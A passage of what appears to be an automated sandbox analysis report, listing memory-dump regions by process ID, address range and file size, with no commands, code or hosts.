                                                                                                                                                                            • memory/2928-206-0x00000000007E0000-0x00000000007E1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/2928-284-0x0000000004FE0000-0x0000000004FE1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/2928-288-0x0000000004FA0000-0x0000000005016000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              472KB

                                                                                                                                                                            • memory/2928-171-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/2968-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3000-248-0x0000000000ED0000-0x0000000000EE5000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              84KB

                                                                                                                                                                            • memory/3196-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3224-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3256-202-0x0000000004ED0000-0x0000000004ED1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/3256-234-0x0000000007740000-0x0000000007741000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/3256-217-0x0000000007100000-0x0000000007101000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/3256-223-0x0000000006FF0000-0x0000000006FF1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/3256-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3256-201-0x0000000004ED0000-0x0000000004ED1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/3256-231-0x0000000007102000-0x0000000007103000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/3708-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3740-264-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3740-271-0x00000000006C1000-0x000000000073E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              500KB

                                                                                                                                                                            • memory/3740-350-0x0000000000880000-0x0000000000956000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              856KB

                                                                                                                                                                            • memory/3740-351-0x0000000000400000-0x00000000004D9000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              868KB

                                                                                                                                                                            • memory/3760-405-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3760-485-0x0000000076EB0000-0x000000007703E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.6MB

                                                                                                                                                                            • memory/3832-267-0x00000000007D0000-0x000000000091A000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.3MB

                                                                                                                                                                            • memory/3832-265-0x0000000000700000-0x00000000007AE000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              696KB

                                                                                                                                                                            • memory/3832-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3920-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3976-188-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/3976-194-0x0000000002F20000-0x0000000002F21000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/3976-196-0x0000000002F20000-0x0000000002F21000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4052-254-0x0000000004D70000-0x0000000004D71000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4052-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4052-256-0x0000000002670000-0x0000000002671000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4052-232-0x0000000000370000-0x0000000000371000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4052-238-0x0000000000CA0000-0x0000000000CAC000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              48KB

                                                                                                                                                                            • memory/4052-236-0x0000000000C90000-0x0000000000C91000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4056-277-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4064-221-0x0000000000DF0000-0x0000000000DF1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4064-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4112-339-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              80KB

                                                                                                                                                                            • memory/4112-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4320-378-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4320-386-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              80KB

                                                                                                                                                                            • memory/4348-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4348-397-0x0000000004C80000-0x0000000004C81000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4360-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4460-394-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4460-446-0x0000000004C20000-0x0000000004C21000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4464-456-0x0000000004A10000-0x0000000004A11000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4464-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4512-424-0x00000000026F0000-0x00000000026F2000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              8KB

                                                                                                                                                                            • memory/4512-320-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4536-450-0x0000000076EB0000-0x000000007703E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.6MB

                                                                                                                                                                            • memory/4536-505-0x0000000003470000-0x0000000003471000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4536-392-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4560-389-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4560-440-0x00000000054E0000-0x00000000054E1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4572-390-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4580-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4580-509-0x0000000076EB0000-0x000000007703E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.6MB

                                                                                                                                                                            • memory/4616-391-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4624-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4624-479-0x0000000076EB0000-0x000000007703E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.6MB

                                                                                                                                                                            • memory/4648-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4648-361-0x0000000004B90000-0x0000000004B91000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4656-513-0x0000000002894000-0x0000000002895000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4656-465-0x0000000002893000-0x0000000002894000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4656-507-0x0000000002890000-0x0000000002891000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4656-460-0x0000000002892000-0x0000000002893000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4684-444-0x0000000076EB0000-0x000000007703E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.6MB

                                                                                                                                                                            • memory/4684-496-0x00000000056B0000-0x00000000056B1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4684-396-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4736-365-0x000000000041B236-mapping.dmp
                                                                                                                                                                            • memory/4736-380-0x0000000005680000-0x0000000005C86000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              6.0MB

                                                                                                                                                                            • memory/4776-399-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4820-400-0x0000000004ED0000-0x0000000004ED1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4820-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4896-362-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4896-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4984-420-0x0000000000C60000-0x0000000000CBD000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              372KB

                                                                                                                                                                            • memory/4984-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4984-413-0x0000000000B10000-0x0000000000BBE000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              696KB

                                                                                                                                                                            • memory/5000-388-0x000000000041B23A-mapping.dmp
                                                                                                                                                                            • memory/5000-506-0x0000000004FE0000-0x00000000055E6000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              6.0MB

                                                                                                                                                                            • memory/5040-468-0x0000000076EB0000-0x000000007703E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.6MB

                                                                                                                                                                            • memory/5040-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5108-492-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB